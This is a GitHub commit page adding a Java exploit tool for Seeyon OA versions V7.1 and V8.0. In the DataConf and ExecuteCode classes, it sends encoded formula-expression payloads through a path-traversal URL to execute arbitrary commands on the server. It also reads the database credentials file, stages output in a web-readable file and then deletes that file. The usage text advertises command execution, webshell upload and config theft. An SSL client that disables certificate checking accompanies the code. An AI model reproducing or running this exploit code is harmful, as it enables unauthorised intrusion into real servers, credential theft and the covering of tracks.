forked from TimelineSec/ATTCK-Tools-library
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
14 changed files
with
492 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<project xmlns="http://maven.apache.org/POM/4.0.0" | ||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
<modelVersion>4.0.0</modelVersion> | ||
|
||
<groupId>groupId</groupId> | ||
<artifactId>Seeyon</artifactId> | ||
<version>1.0-SNAPSHOT</version> | ||
<build> | ||
<plugins> | ||
<plugin> | ||
<groupId>org.apache.maven.plugins</groupId> | ||
<artifactId>maven-compiler-plugin</artifactId> | ||
<configuration> | ||
<source>7</source> | ||
<target>7</target> | ||
</configuration> | ||
</plugin> | ||
</plugins> | ||
</build> | ||
<dependencies> | ||
<dependency> | ||
<groupId>commons-codec</groupId> | ||
<artifactId>commons-codec</artifactId> | ||
<version>1.15</version> | ||
</dependency> | ||
<dependency> | ||
<groupId>org.apache.httpcomponents</groupId> | ||
<artifactId>httpclient</artifactId> | ||
<version>4.5.13</version> | ||
</dependency> | ||
<dependency> | ||
<groupId>org.json</groupId> | ||
<artifactId>json</artifactId> | ||
<version>20180813</version> | ||
</dependency> | ||
</dependencies> | ||
</project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
Manifest-Version: 1.0 | ||
Main-Class: ExpMain | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
import java.util.UUID; | ||
|
||
public class DataConf { | ||
public void DataConf(String oaUrl) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; | ||
UUID uuid = UUID.randomUUID(); | ||
String uuidStr = uuid.toString(); | ||
uuidStr = uuidStr.replace("-", ""); | ||
String getUrl = oaUrl + "/" + uuidStr + ".txt"; | ||
String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; | ||
String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; | ||
String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; | ||
String winReadDadaConf = "cd ../../base/conf & type datasourceCtp.properties"; | ||
String linReadDadaConf = "cat ../../base/conf/datasourceCtp.properties"; | ||
String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + winReadDadaConf + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + linReadDadaConf + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();System.out.println(sbStr);sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i<enChar.length;i++){ int intCh = (int)enChar[i]+1;Base65 = Base65 + Integer.toHexString(intCh); };java.io.FileWriter writer = new java.io.FileWriter(\""+uuidTxt+"\");writer.write(Base65);writer.flush();writer.close();};test();def static xxx(){'},'',{},'true']"; | ||
String execUrl = new Encoder().Encoder(execString); | ||
String execExp = "managerMethod=validate&arguments=" + execUrl; | ||
//删除回显文件payload | ||
//java文件删除无法删除文件,应该是权限不够 | ||
//String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'java.io.File file=new java.io.File(\""+uuidTxt+"\");file.delete();};test();def static xxx(){'},'',{},'true']"; | ||
String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\""+winDel+"\");Process process = pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\""+linuxDel+"\");Process process = pb.start();}};test();def static xxx(){'},'',{},'true']"; | ||
String expDelUrl = new Encoder().Encoder(delString); | ||
String expDel = "managerMethod=validate&arguments=" + expDelUrl; | ||
System.out.println(execExp); | ||
//执行的顺序为,写入回显文件,得到回显文件内容,删除回显文件 | ||
httpClient.sendPost(realUrl,execExp); | ||
Thread.sleep(2 * 1000); | ||
httpClient.getRes(getUrl); | ||
Thread.sleep(2 * 1000); | ||
httpClient.doDel(getUrl,expDel); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
import java.io.ByteArrayInputStream; | ||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.net.URLDecoder; | ||
import java.util.zip.GZIPInputStream; | ||
|
||
public class Decoder { | ||
public String Decoder(String decodeStr) throws IOException { | ||
ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); | ||
decodeStr = URLDecoder.decode(decodeStr,"UTF-8"); | ||
ByteArrayInputStream byteIn = new ByteArrayInputStream(decodeStr.getBytes("iso-8859-1")); | ||
GZIPInputStream gzipInput = new GZIPInputStream(byteIn); | ||
byte[] buffer = new byte[1024]; | ||
int n; | ||
while ((n=gzipInput.read(buffer))>=0){ | ||
byteOut.write(buffer,0,n); | ||
} | ||
return byteOut.toString(); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
import java.io.ByteArrayOutputStream; | ||
import java.io.IOException; | ||
import java.net.URLEncoder; | ||
import java.util.zip.GZIPOutputStream; | ||
|
||
public class Encoder { | ||
|
||
public String Encoder(String encodeStr) throws IOException { | ||
ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); | ||
GZIPOutputStream gzipOut = new GZIPOutputStream(byteOut); | ||
gzipOut.write(encodeStr.getBytes("UTF-8")); | ||
gzipOut.close(); | ||
gzipOut.flush(); | ||
String gzipEnStr = byteOut.toString("iso-8859-1"); | ||
return URLEncoder.encode(gzipEnStr,"UTF-8"); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,31 @@ | ||
import java.util.UUID; | ||
|
||
public class ExecuteCode { | ||
public void ExecuteCode(String oaUrl,String cmd) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
UUID uuid = UUID.randomUUID(); | ||
String uuidStr = uuid.toString(); | ||
uuidStr = uuidStr.replace("-", ""); | ||
String realUrl = oaUrl + "/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip"; | ||
String getUrl = oaUrl + "/" + uuidStr + ".txt"; | ||
String uuidTxt = "../webapps/seeyon/" + uuidStr + ".txt"; | ||
String winDel = "cd ../webapps/seeyon&del "+uuidStr+".txt"; | ||
String linuxDel = "cd ../webapps/seeyon;rm -f " +uuidStr+".txt"; | ||
//执行命令 | ||
String execString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");Process pc = null;if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\"" + cmd + "\");pc =pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\"" + cmd + "\");pc = pb.start();};java.io.BufferedReader br = new java.io.BufferedReader(new InputStreamReader(pc.getInputStream(),\"GBK\"));String line = \"\";StringBuilder sb = new StringBuilder();while((line = br.readLine())!=null){sb.append(line+\"\\\\n\");};br.close();String sbStr = sb.toString();sun.misc.BASE64Encoder encoder=new sun.misc.BASE64Encoder();byte[] enByte = sbStr.getBytes(\"UTF-8\");String enStr = encoder.encode(enByte);char[] enChar = enStr.toCharArray();String Base65 = \"\";for (int i=0;i<enChar.length;i++){ int intCh = (int)enChar[i]+1;Base65 = Base65 + Integer.toHexString(intCh); };java.io.FileWriter writer = new java.io.FileWriter(\""+uuidTxt+"\");writer.write(Base65);writer.flush();writer.close();};test();def static xxx(){'},'',{},'true']"; | ||
System.out.println(execString); | ||
String execUrl = new Encoder().Encoder(execString); | ||
String execExp = "managerMethod=validate&arguments=" + execUrl; | ||
System.out.println(execExp); | ||
//删除命令回显文件 | ||
String delString = "[{'formulaType':1,'formulaName':'test','formulaExpression':'Properties prop = System.getProperties(); String os = prop.getProperty(\"os.name\");if (os.startsWith(\"win\") || os.startsWith(\"Win\")){ProcessBuilder pb=new ProcessBuilder(\"cmd\",\"/c\",\""+winDel+"\");Process process = pb.start();}else{ProcessBuilder pb=new ProcessBuilder(\"/bin/sh\",\"-c\",\""+linuxDel+"\");Process process = pb.start();}};test();def static xxx(){'},'',{},'true']"; | ||
String execDel = new Encoder().Encoder(delString); | ||
execDel = "managerMethod=validate&arguments=" + execDel; | ||
|
||
httpClient.sendPost(realUrl,execExp); | ||
Thread.sleep(2 * 1000); | ||
httpClient.getRes(getUrl); | ||
Thread.sleep(2 * 1000); | ||
httpClient.doDel(realUrl,execDel); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
public class ExpMain { | ||
public static void main(String args[]) throws Exception { | ||
if (args.length == 2 && !args[1].equals("dataConf") && !args[0].equals("scan") && !args[0].equals("encode") && !args[0].equals("decode")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new ExecuteCode().ExecuteCode(args[0],args[1]); | ||
} else if (args.length == 2 && args[1].equals("dataConf")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new DataConf().DataConf(args[0]); | ||
} else if (args.length == 4 && args[1].equals("shell")) { | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
new UploadShell().UploadShell(args[0],args[2],args[3]); | ||
} else if (args.length == 2 && args[0].equals("scan")){ | ||
System.out.println("[*]正在执行......, 漏洞影响版本:V7.1、V8.0"); | ||
if (args[1].contains("http:") || args[1].contains("https:")){ | ||
VersionRecognition versionRecognition = new VersionRecognition(); | ||
versionRecognition.VersionRecognition(args[1]); | ||
} | ||
}else if (args.length == 2 && args[0].equals("encode")){ | ||
System.out.println("ciphertext:\n" +new Encoder().Encoder(args[1])); | ||
}else if (args.length == 2 && args[0].equals("decode")){ | ||
System.out.println("Plaintext:\n" +new Decoder().Decoder(args[1])); | ||
}else { | ||
System.out.println("[*]使用说明:\n" + | ||
"[*]无损检验是否存在漏洞:scan http/https://xxxx.com:port/seeyon \n"+ | ||
"[*]执行命令:http/https://xxxx.com:port/seeyon cmd\n" + | ||
"[*]写入shell:http/https://xxxx.com:port/seeyon shell srcFile desFile,第三个参数为本地的shell文件,第四个参数为写入服务器的文件名\n" + | ||
"[*]读取数据库配置文件:http/https://xxxx.com:port/seeyon dataConf\n" + | ||
"[*]流量解码:decode ciphertext\n"+ | ||
"[*]流量编码:encode Plaintext\n"); | ||
System.exit(0); | ||
} | ||
} | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,108 @@ | ||
import org.apache.http.HttpResponse; | ||
import org.apache.http.client.HttpClient; | ||
import org.apache.http.client.methods.CloseableHttpResponse; | ||
import org.apache.http.client.methods.HttpGet; | ||
import org.apache.http.client.methods.HttpPost; | ||
import org.apache.http.client.utils.URIBuilder; | ||
import org.apache.http.entity.StringEntity; | ||
import org.apache.http.impl.client.CloseableHttpClient; | ||
import org.apache.http.impl.client.DefaultHttpClient; | ||
import org.apache.http.util.EntityUtils; | ||
import sun.misc.BASE64Decoder; | ||
|
||
import java.io.IOException; | ||
|
||
public class HTTPClient { | ||
public String sendPost(String url, String param) throws Exception { | ||
if(url.startsWith("http:")){ | ||
HttpPost httpPost = new HttpPost(url); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
//httpPost.setHeader("Connection","close"); | ||
httpPost.setEntity(stringEntity); | ||
HttpResponse response = new DefaultHttpClient().execute(httpPost); | ||
String result = EntityUtils.toString(response.getEntity()); | ||
System.out.println(result); | ||
return result; | ||
}else{ | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpPost httpPost = new HttpPost(uriBuilder.build()); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
//httpPost.setHeader("Connection","close"); | ||
httpPost.setEntity(stringEntity); | ||
CloseableHttpResponse response = client.execute(httpPost); | ||
String result = EntityUtils.toString(response.getEntity()); | ||
System.out.println(result); | ||
return result; | ||
} | ||
} | ||
//http与https 得到回显内容 | ||
public String getRes(String url) throws Exception { | ||
String result; | ||
if (url.startsWith("http:")){ | ||
HttpClient client = new DefaultHttpClient(); | ||
HttpGet request = new HttpGet(url); | ||
//request.setHeader("Connection","close"); | ||
HttpResponse response = client.execute(request); | ||
result = EntityUtils.toString(response.getEntity()); | ||
if (result != null){ | ||
result = decode(result); | ||
System.out.println(result); | ||
} | ||
}else { | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpGet httpGet = new HttpGet(uriBuilder.build()); | ||
CloseableHttpResponse response = client.execute(httpGet); | ||
result = EntityUtils.toString(response.getEntity()); | ||
if (result != null) { | ||
result = decode(result); | ||
System.out.println(result); | ||
} | ||
} | ||
return result; | ||
} | ||
//测试是否有 | ||
//http与https 删除回显输出文件 | ||
public void doDel(String url,String param) throws Exception { | ||
if (url.startsWith("http:")){ | ||
HttpPost httpPost = new HttpPost(url); | ||
httpPost.setHeader("Connection","close"); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
httpPost.setEntity(stringEntity); | ||
HttpClient client = new DefaultHttpClient(); | ||
HttpResponse response = new DefaultHttpClient().execute(httpPost); | ||
if (response != null){ | ||
System.out.println("[*]命令执行完毕"); | ||
} | ||
}else { | ||
CloseableHttpClient client = new SSLClient(); | ||
URIBuilder uriBuilder = new URIBuilder(url); | ||
HttpPost httpPost = new HttpPost(uriBuilder.build()); | ||
httpPost.setHeader("Connection","close"); | ||
StringEntity stringEntity = new StringEntity(param); | ||
stringEntity.setContentType("application/x-www-form-urlencoded"); | ||
httpPost.setEntity(stringEntity); | ||
CloseableHttpResponse response = client.execute(httpPost); | ||
if (response !=null){ | ||
System.out.println("[*]命令执行完毕"); | ||
} | ||
} | ||
} | ||
//BASE65解码模块 | ||
public String decode(String string) throws IOException { | ||
BASE64Decoder decoder = new BASE64Decoder(); | ||
String deStr = ""; | ||
for(int i=0;i<string.length();i=i+2){ | ||
String str2 = string.substring(i,i+2); | ||
char char2 = (char)(Integer.parseInt(str2,16)-1); | ||
deStr = deStr + char2; | ||
} | ||
deStr = deStr.replaceAll("ê",""); | ||
String realStr = new String(decoder.decodeBuffer(deStr),"UTF-8"); | ||
return realStr; | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
import java.io.*; | ||
import java.util.Iterator; | ||
|
||
import org.json.JSONArray; | ||
import org.json.JSONObject; | ||
|
||
public class JsonRead { | ||
|
||
public JSONObject JsonRead() throws IOException { | ||
String jsonString = ""; | ||
File jsonFile = new File("vul.json"); | ||
InputStreamReader reader = new InputStreamReader(new FileInputStream(jsonFile),"UTF-8"); | ||
String fileString = ""; | ||
BufferedReader bufferedReader = new BufferedReader(reader); | ||
while ((fileString = bufferedReader.readLine())!= null){ | ||
jsonString = jsonString + fileString; | ||
} | ||
JSONObject jsonObject = new JSONObject(jsonString); | ||
|
||
JSONArray jsonArray = new JSONArray(); | ||
jsonArray = jsonObject.getJSONArray("Vulnerabilities"); | ||
return jsonArray.getJSONObject(0); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
import java.security.cert.CertificateException; | ||
import java.security.cert.X509Certificate; | ||
import javax.net.ssl.SSLContext; | ||
import javax.net.ssl.TrustManager; | ||
import javax.net.ssl.X509TrustManager; | ||
import org.apache.http.conn.ClientConnectionManager; | ||
import org.apache.http.conn.scheme.Scheme; | ||
import org.apache.http.conn.scheme.SchemeRegistry; | ||
import org.apache.http.conn.ssl.SSLSocketFactory; | ||
import org.apache.http.impl.client.DefaultHttpClient; | ||
|
||
public class SSLClient extends DefaultHttpClient { | ||
public SSLClient() throws Exception{ | ||
super(); | ||
SSLContext ctx = SSLContext.getInstance("TLS"); | ||
X509TrustManager tm = new X509TrustManager() { | ||
public void checkClientTrusted(X509Certificate[] chain, | ||
String authType) throws CertificateException { | ||
} | ||
@Override | ||
public void checkServerTrusted(X509Certificate[] chain, | ||
String authType) throws CertificateException { | ||
} | ||
@Override | ||
public X509Certificate[] getAcceptedIssuers() { | ||
return null; | ||
} | ||
}; | ||
ctx.init(null, new TrustManager[]{tm}, null); | ||
SSLSocketFactory ssf = new SSLSocketFactory(ctx,SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); | ||
ClientConnectionManager ccm = this.getConnectionManager(); | ||
SchemeRegistry sr = ccm.getSchemeRegistry(); | ||
sr.register(new Scheme("https", 443, ssf)); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
public class Scanner{ | ||
public String Scanner(String poc,String url,String method,String res) throws Exception { | ||
HTTPClient httpClient = new HTTPClient(); | ||
String result = ""; | ||
if (method.toLowerCase().equals("post")) { | ||
result = httpClient.sendPost(url, poc); | ||
} else { | ||
result = httpClient.getRes(url); | ||
} | ||
if (result.contains(res)) { | ||
return url + "\n[!]:漏洞存在"; | ||
} else { | ||
return url + "[*]:漏洞不存在"; | ||
} | ||
} | ||
} |
Oops, something went wrong.